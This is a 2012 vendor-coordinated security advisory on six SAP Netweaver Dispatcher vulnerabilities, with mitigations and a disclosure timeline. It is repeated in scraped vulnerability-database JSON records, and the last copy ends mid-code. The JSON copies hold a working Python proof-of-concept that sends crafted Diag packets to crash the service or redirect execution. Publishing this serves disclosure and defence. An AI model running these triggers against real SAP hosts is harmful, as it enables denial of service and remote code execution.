Title: SAP Netweaver Dispatcher Multiple Vulnerabilities
Advisory ID: CORE-2012-0123
Advisory URL:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
Date published: 2012-05-08
Date of last update: 2012-05-08
Vendors contacted: SAP
Release mode: Coordinated release
Vulnerability Information
Class: Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,
CVE-2012-2513, CVE-2012-2514
Vulnerability Description
SAP Netweaver [1] is a technology platform for building and integrating
SAP business applications. Multiple vulnerabilities have been found in
SAP Netweaver that could allow an unauthenticated, remote attacker to
execute arbitrary code and lead to denial of service conditions. The
vulnerabilities are triggered sending specially crafted SAP Diag packets
to remote TCP port 32NN (being NN the SAP system number) of a host
running the "Dispatcher" service, part of SAP Netweaver Application
Server ABAP. By sending different messages, the different
vulnerabilities can be triggered.
Vulnerable packages
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).
. SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).
. Older versions are probably affected too, but they were not checked.
Non-vulnerable packages
. Vendor did not provide this information.
Vendor Information, Solutions and Workarounds
SAP released the security note
https://service.sap.com/sap/support/notes/1687910 regarding these
issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of
the vulnerabilities:
Disable work processes' Developer Traces for the 'Dialog
Processing' component (for the vulnerabilities [CVE-2011-1516],
[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
Restrict access to the Dispatcher service's TCP ports (3200/3299)
(for all vulnerabilities).
Restrict access to the work process management transactions
SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the
vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and
[CVE-2012-2512]).
Credits
These vulnerabilities were discovered and researched by Martin Gallo
from
http://www.coresecurity.com/content/services-overview-core-security-consulting-services.
The publication of this advisory was coordinated by Fernando Miranda
from http://www.coresecurity.com/content/corelabs-advisories .
Technical Description / Proof of Concept Code
NOTE: (The tracing of 'Dialog processing' has to be in level 2 or 3 in
order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]
and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities
described below:
/-----
import socket, struct
from optparse import OptionParser
-----/
In the following subsections, we give the python code that can be added
after the script above in order to reproduce all vulnerabilities.
8.1. SAP Netweaver DiagTraceR3Info Vulnerability
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver
'disp+work.exe' module process a specially crafted network packet.
Malicious packets are processed by the vulnerable function
'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace
is configured at levels 2 or 3 for the "Dialog processor" component of
the "Dialog" work process handling the packet [2]. This vulnerability
could allow a remote unauthenticated attacker to execute arbitrary code
with the privileges of the user running the "Dispatcher" service. The
following python code can be used to trigger the vulnerability:
8.2. SAP Netweaver DiagTraceHex Denial of Service Vulnerability
[CVE-2011-1517] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a
remote unauthenticated attacker to conduct a denial of service attack
against the vulnerable systems. The following python code can be used to
trigger the vulnerability:
8.3. SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability
[CVE-2012-2511] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceAtoms'. This vulnerability could allow a remote
unauthenticated attacker to conduct a denial of service attack. The
following python code can be used to trigger the vulnerability:
8.4. SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability
[CVE-2012-2512] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceStreamI' and could allow a remote unauthenticated attacker to
conduct a denial of service attack.
8.5. SAP Netweaver Diaginput Denial of Service Vulnerability
[CVE-2012-2513] The vulnerability can be triggered by the vulnerable
function 'Diaginput', allowing a denial of service attack against the
vulnerable systems.
8.6. SAP Netweaver DiagiEventSource Denial of Service Vulnerability
[CVE-2012-2514] The vulnerability can be triggered by the vulnerable
function 'DiagiEventSource' in the 'disp+work.exe' module. This
vulnerability could allow a remote unauthenticated attacker to conduct a
denial of service attack.
. 2012-01-24:
Core Security Technologies notifies the SAP team of the vulnerability,
setting the estimated publication date of the advisory for February
21st, 2012.
. 2012-01-24:
Core sends an advisory draft with technical details.
. 2012-01-24:
The SAP team confirms the reception of the issue and asks to use the
security ID 582820-2012 for further communication. SAP also notifies its
terms and conditions [3], and asks for Core to commit to that guideline.
. 2012-02-01:
The Core Advisories Team communicates that it has its own guidelines for
the advisories publication process, which may conflict with SAP's
guidelines. In particular, Core does not guarantee that the publication
of the advisory will be postponed until a fix or patch is made available
by SAP. If information about this vulnerability is partially or
completely leaked by a third party, the advisory would be released
immediately as forced release. Despite this, the Core team commits to
comply with SAP's guidelines as much as possible.
. 2012-02-21:
First release date missed.
. 2012-02-22:
Core asks for the status of the fix and notifies that the release date
was missed.
. 2012-02-23:
SAP notifies that, because the development team has to downport the
solutions for a huge bunch of software releases, the earliest release
date for the patches would be May 8th 2012.
. 2012-02-23:
Core re-schedules the advisory publication to May 8th.
. 2012-04-16:
Core asks if the patching process is still on track to release patches
on May 8th and requests a status of the fix.
. 2012-04-16:
Vendor notifies that the release date is still planned for May 8th, but
due to quality control processes this date cannot be guaranteed.
. 2012-05-04:
Core notifies that everything is ready for publication and requests the
vendor to confirm the release date and the list of affected platforms
(no reply received).
. 2012-05-07:
Core asks again for the status of the fix.
. 2012-05-08:
SAP notifies that they have released the security note 1687910 [4] on
May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP
also requests Core to remove all the technical information researched by
Martin Gallo in [Sec. 8].
. 2012-05-08:
Core replies that the reporting of vulnerabilities is aimed at helping
vulnerable users to understand and address the issues; the advisory will
thus be released with the technical information.
[4] SAP security note 1687910
https://service.sap.com/sap/support/notes/1687910.
About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.
About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
Disclaimer
The contents of this advisory are copyright (c) 2012 Core Security
Technologies and (c) 2012 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
{"id": "SECURITYVULNS:DOC:28076", "bulletinFamily": "software", "title": "CORE-2012-0123 - SAP Netweaver Dispatcher Multiple Vulnerabilities", "description": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nSAP Netweaver Dispatcher Multiple Vulnerabilities\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\r\nAdvisory ID: CORE-2012-0123\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\r\nDate published: 2012-05-08\r\nDate of last update: 2012-05-08\r\nVendors contacted: SAP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Buffer overflow [CWE-119]\r\nImpact: Code execution, Denial of service\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,\r\nCVE-2012-2513, CVE-2012-2514\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nSAP Netweaver [1] is a technology platform for building and integrating\r\nSAP business applications. Multiple vulnerabilities have been found in\r\nSAP Netweaver that could allow an unauthenticated, remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered sending specially crafted SAP Diag packets\r\nto remote TCP port 32NN (being NN the SAP system number) of a host\r\nrunning the "Dispatcher" service, part of SAP Netweaver Application\r\nServer ABAP. By sending different messages, the different\r\nvulnerabilities can be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).\r\n . SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).\r\n . Older versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Vendor did not provide this information.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nSAP released the security note\r\nhttps://service.sap.com/sap/support/notes/1687910 regarding these\r\nissues. Contact SAP for further information.\r\n\r\nMartin Gallo proposed the following actions to mitigate the impact of\r\nthe vulnerabilities:\r\n\r\n 1. Disable work processes' Developer Traces for the 'Dialog\r\nProcessing' component (for the vulnerabilities [CVE-2011-1516],\r\n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).\r\n 2. Restrict access to the Dispatcher service's TCP ports (3200/3299)\r\n(for all vulnerabilities).\r\n 3. Restrict access to the work process management transactions\r\nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the\r\nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and\r\n[CVE-2012-2512]).\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Martin Gallo\r\nfrom\r\nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services.\r\nThe publication of this advisory was coordinated by Fernando Miranda\r\nfrom http://www.coresecurity.com/content/corelabs-advisories .\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in\r\norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]\r\nand [CVE-2012-2512]).\r\n\r\nThe following python script can be used to reproduce the vulnerabilities\r\ndescribed below:\r\n\r\n/-----\r\nimport socket, struct\r\nfrom optparse import OptionParser\r\n\r\n# Parse the target options\r\nparser = OptionParser()\r\nparser.add_option("-l", "--hostname", dest="hostname", help="Hostname",\r\ndefault="localhost")\r\nparser.add_option("-p", "--port", dest="port", type="int", help="Port\r\nnumber", default=3200)\r\n(options, args) = parser.parse_args()\r\n\r\ndef send_packet(sock, packet):\r\n packet = struct.pack("!I", len(packet)) + packet\r\n sock.send(packet)\r\n\r\ndef receive(sock):\r\n length = sock.recv(4)\r\n (length, ) = struct.unpack("!I", length)\r\n data = ""\r\n while len(data)<length:\r\n data+= sock.recv(length)\r\n return (length, data)\r\n\r\ndef initialize(sock):\r\n diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"\r\n user_connect =\r\n"\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"\r\n support_data = "\x10\x04\x0b\x00\x20"\r\n support_data+=\r\n"\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"\r\n support_data+=\r\n"\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"\r\n dpheader =\r\n"\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"\r\n dpheader+= struct.pack("I", len(diagheader + user_connect +\r\nsupport_data))\r\n dpheader+=\r\n"\x00\xff\xff\xff\xff\xff\xff "\r\n dpheader+= "terminalXXXXXXX"\r\n dpheader+=\r\n"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \r\n\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"\r\n send_packet(sock, dpheader + diagheader + user_connect + support_data)\r\n\r\ndef send_message(sock, message):\r\n diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"\r\n step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"\r\n eom = "\x0c"\r\n send_packet(sock, diagheader + step + message + eom)\r\n\r\n# Connect and send initialization packet\r\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnection.connect((options.hostname, options.port))\r\ninitialize(connection)\r\nreceive(connection) \r\n\r\n-----/\r\n In the following subsections, we give the python code that can be added\r\nafter the script above in order to reproduce all vulnerabilities.\r\n\r\n\r\n8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*\r\n\r\n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver\r\n'disp+work.exe' module process a specially crafted network packet.\r\nMalicious packets are processed by the vulnerable function\r\n'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace\r\nis configured at levels 2 or 3 for the "Dialog processor" component of\r\nthe "Dialog" work process handling the packet [2]. This vulnerability\r\ncould allow a remote unauthenticated attacker to execute arbitrary code\r\nwith the privileges of the user running the "Dispatcher" service. The\r\nfollowing python code can be used to trigger the vulnerability:\r\n\r\n/-----\r\ncrash = "X"*114 + "\xff\xff" # --> Unicode Address to call !\r\ncrash+= "Y"*32\r\ncrash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability*\r\n\r\n[CVE-2011-1517] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a\r\nremote unauthenticated attacker to conduct a denial of service attack\r\nagainst the vulnerable systems. The following python code can be used to\r\ntrigger the vulnerability:\r\n\r\n/-----\r\ncrash = "\x12\x04\x18\xff\xff\xff\xffCrash!"\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2511] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceAtoms'. This vulnerability could allow a remote\r\nunauthenticated attacker to conduct a denial of service attack. The\r\nfollowing python code can be used to trigger the vulnerability:\r\n\r\n/-----\r\ncrash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2512] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceStreamI' and could allow a remote unauthenticated attacker to\r\nconduct a denial of service attack.\r\n\r\n/-----\r\ncrash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51"\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable\r\nfunction 'Diaginput', allowing a denial of service attack against the\r\nvulnerable systems.\r\n\r\n/-----\r\ncrash = "\x10\x0c\x0e\x00\0a" + "A"*10\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable\r\nfunction 'DiagiEventSource' in the 'disp+work.exe' module. This\r\nvulnerability could allow a remote unauthenticated attacker to conduct a\r\ndenial of service attack.\r\n\r\n/-----\r\ncrash = "\x10\x0f\x01\x00\x11" + "A"*17\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2012-01-24:\r\nCore Security Technologies notifies the SAP team of the vulnerability,\r\nsetting the estimated publication date of the advisory for February\r\n21st, 2012.\r\n\r\n. 2012-01-24:\r\nCore sends an advisory draft with technical details.\r\n\r\n. 2012-01-24:\r\nThe SAP team confirms the reception of the issue and asks to use the\r\nsecurity ID 582820-2012 for further communication. SAP also notifies its\r\nterms and conditions [3], and asks for Core to commit to that guideline.\r\n\r\n. 2012-02-01:\r\nThe Core Advisories Team communicates that it has its own guidelines for\r\nthe advisories publication process, which may conflict with SAP's\r\nguidelines. In particular, Core does not guarantee that the publication\r\nof the advisory will be postponed until a fix or patch is made available\r\nby SAP. If information about this vulnerability is partially or\r\ncompletely leaked by a third party, the advisory would be released\r\nimmediately as forced release. Despite this, the Core team commits to\r\ncomply with SAP's guidelines as much as possible.\r\n\r\n. 2012-02-21:\r\nFirst release date missed.\r\n\r\n. 2012-02-22:\r\nCore asks for the status of the fix and notifies that the release date\r\nwas missed.\r\n\r\n. 2012-02-23:\r\nSAP notifies that, because the development team has to downport the\r\nsolutions for a huge bunch of software releases, the earliest release\r\ndate for the patches would be May 8th 2012.\r\n\r\n. 2012-02-23:\r\nCore re-schedules the advisory publication to May 8th.\r\n\r\n. 2012-04-16:\r\nCore asks if the patching process is still on track to release patches\r\non May 8th and requests a status of the fix.\r\n\r\n. 2012-04-16:\r\nVendor notifies that the release date is still planned for May 8th, but\r\ndue to quality control processes this date cannot be guaranteed.\r\n\r\n. 2012-05-04:\r\nCore notifies that everything is ready for publication and requests the\r\nvendor to confirm the release date and the list of affected platforms\r\n(no reply received).\r\n\r\n. 2012-05-07:\r\nCore asks again for the status of the fix.\r\n\r\n. 2012-05-08:\r\nSAP notifies that they have released the security note 1687910 [4] on\r\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\r\nalso requests Core to remove all the technical information researched by\r\nMartin Gallo in [Sec. 8].\r\n\r\n. 2012-05-08:\r\nCore replies that the reporting of vulnerabilities is aimed at helping\r\nvulnerable users to understand and address the issues; the advisory will\r\nthus be released with the technical information.\r\n\r\n. 2012-05-08:\r\nAdvisory CORE-2012-0123 published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] http://www.sap.com/platform/netweaver/index.epx\r\n[2]\r\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\r\n[3] SAP's legal information, terms and conditions\r\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.\r\n\r\n[4] SAP security note 1687910\r\nhttps://service.sap.com/sap/support/notes/1687910.\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2012 Core Security\r\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n", "published": "2012-05-14T00:00:00", "modified": "2012-05-14T00:00:00", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28076", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2011-1516", "CVE-2011-1517", "CVE-2012-2514", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2511"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:44", "edition": 1, "viewCount": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2018-08-31T11:10:44", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12038", "SECURITYVULNS:DOC:27304", "SECURITYVULNS:VULN:12379"]}, {"type": "seebug", "idList": ["SSV:74568", "SSV:23189", "SSV:72871"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112538", "PACKETSTORM:106850"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:5E02FE625A985E79A644BA6E4CB62E2F", "EXPLOITPACK:38C9271832F7D463B695A8339E8E1E4C"]}, {"type": "cve", "idList": ["CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2514", "CVE-2012-2511", "CVE-2011-1516", "CVE-2011-1517"]}, {"type": "exploitdb", "idList": ["EDB-ID:20705", "EDB-ID:18853"]}, {"type": "openvas", "idList": ["OPENVAS:803223", "OPENVAS:1361412562310803223"]}], "modified": "2018-08-31T11:10:44", "rev": 2}, "vulnersScore": 7.2}, "affectedSoftware": []}
{"packetstorm": [{"lastseen": "2016-12-05T22:18:13", "description": "", "published": "2012-05-08T00:00:00", "type": "packetstorm", "title": "SAP Netweaver 7.0 EHP1/EHP2 Buffer Overflows", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1516", "CVE-2011-1517", "CVE-2012-2514", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2511"], "modified": "2012-05-08T00:00:00", "id": "PACKETSTORM:112538", "href": "https://packetstormsecurity.com/files/112538/SAP-Netweaver-7.0-EHP1-EHP2-Buffer-Overflows.html", "sourceData": "`Core Security - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nSAP Netweaver Dispatcher Multiple Vulnerabilities \n \n \n1. *Advisory Information* \n \nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities \nAdvisory ID: CORE-2012-0123 \nAdvisory URL: \nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities \nDate published: 2012-05-08 \nDate of last update: 2012-05-08 \nVendors contacted: SAP \nRelease mode: Coordinated release \n \n \n2. *Vulnerability Information* \n \nClass: Buffer overflow [CWE-119] \nImpact: Code execution, Denial of service \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, \nCVE-2012-2513, CVE-2012-2514 \n \n \n3. *Vulnerability Description* \n \nSAP Netweaver [1] is a technology platform for building and integrating \nSAP business applications. Multiple vulnerabilities have been found in \nSAP Netweaver that could allow an unauthenticated, remote attacker to \nexecute arbitrary code and lead to denial of service conditions. The \nvulnerabilities are triggered sending specially crafted SAP Diag packets \nto remote TCP port 32NN (being NN the SAP system number) of a host \nrunning the \"Dispatcher\" service, part of SAP Netweaver Application \nServer ABAP. By sending different messages, the different \nvulnerabilities can be triggered. \n \n \n4. *Vulnerable packages* \n \n. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). \n. SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). \n. Older versions are probably affected too, but they were not checked. \n \n \n5. *Non-vulnerable packages* \n \n. Vendor did not provide this information. \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nSAP released the security note \nhttps://service.sap.com/sap/support/notes/1687910 regarding these \nissues. Contact SAP for further information. \n \nMartin Gallo proposed the following actions to mitigate the impact of \nthe vulnerabilities: \n \n1. Disable work processes' Developer Traces for the 'Dialog \nProcessing' component (for the vulnerabilities [CVE-2011-1516], \n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). \n2. Restrict access to the Dispatcher service's TCP ports (3200/3299) \n(for all vulnerabilities). \n3. Restrict access to the work process management transactions \nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the \nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and \n[CVE-2012-2512]). \n \n \n7. *Credits* \n \nThese vulnerabilities were discovered and researched by Martin Gallo \nfrom \nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services. \nThe publication of this advisory was coordinated by Fernando Miranda \nfrom http://www.coresecurity.com/content/corelabs-advisories . \n \n \n8. *Technical Description / Proof of Concept Code* \n \n*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in \norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] \nand [CVE-2012-2512]). \n \nThe following python script can be used to reproduce the vulnerabilities \ndescribed below: \n \n/----- \nimport socket, struct \nfrom optparse import OptionParser \n \n# Parse the target options \nparser = OptionParser() \nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\", \ndefault=\"localhost\") \nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port \nnumber\", default=3200) \n(options, args) = parser.parse_args() \n \ndef send_packet(sock, packet): \npacket = struct.pack(\"!I\", len(packet)) + packet \nsock.send(packet) \n \ndef receive(sock): \nlength = sock.recv(4) \n(length, ) = struct.unpack(\"!I\", length) \ndata = \"\" \nwhile len(data)<length: \ndata+= sock.recv(length) \nreturn (length, data) \n \ndef initialize(sock): \ndiagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\" \nuser_connect = \n\"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\" \nsupport_data = \"\\x10\\x04\\x0b\\x00\\x20\" \nsupport_data+= \n\"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\" \nsupport_data+= \n\"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \ndpheader = \n\"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" \ndpheader+= struct.pack(\"I\", len(diagheader + user_connect + \nsupport_data)) \ndpheader+= \n\"\\x00\\xff\\xff\\xff\\xff\\xff\\xff \" \ndpheader+= \"terminalXXXXXXX\" \ndpheader+= \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nsend_packet(sock, dpheader + diagheader + user_connect + support_data) \n \ndef send_message(sock, message): \ndiagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nstep = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\" \neom = \"\\x0c\" \nsend_packet(sock, diagheader + step + message + eom) \n \n# Connect and send initialization packet \nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nconnection.connect((options.hostname, options.port)) \ninitialize(connection) \nreceive(connection) \n \n-----/ \nIn the following subsections, we give the python code that can be added \nafter the script above in order to reproduce all vulnerabilities. \n \n \n8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* \n \n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver \n'disp+work.exe' module process a specially crafted network packet. \nMalicious packets are processed by the vulnerable function \n'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace \nis configured at levels 2 or 3 for the \"Dialog processor\" component of \nthe \"Dialog\" work process handling the packet [2]. This vulnerability \ncould allow a remote unauthenticated attacker to execute arbitrary code \nwith the privileges of the user running the \"Dispatcher\" service. The \nfollowing python code can be used to trigger the vulnerability: \n \n/----- \ncrash = \"X\"*114 + \"\\xff\\xff\" # --> Unicode Address to call ! \ncrash+= \"Y\"*32 \ncrash = 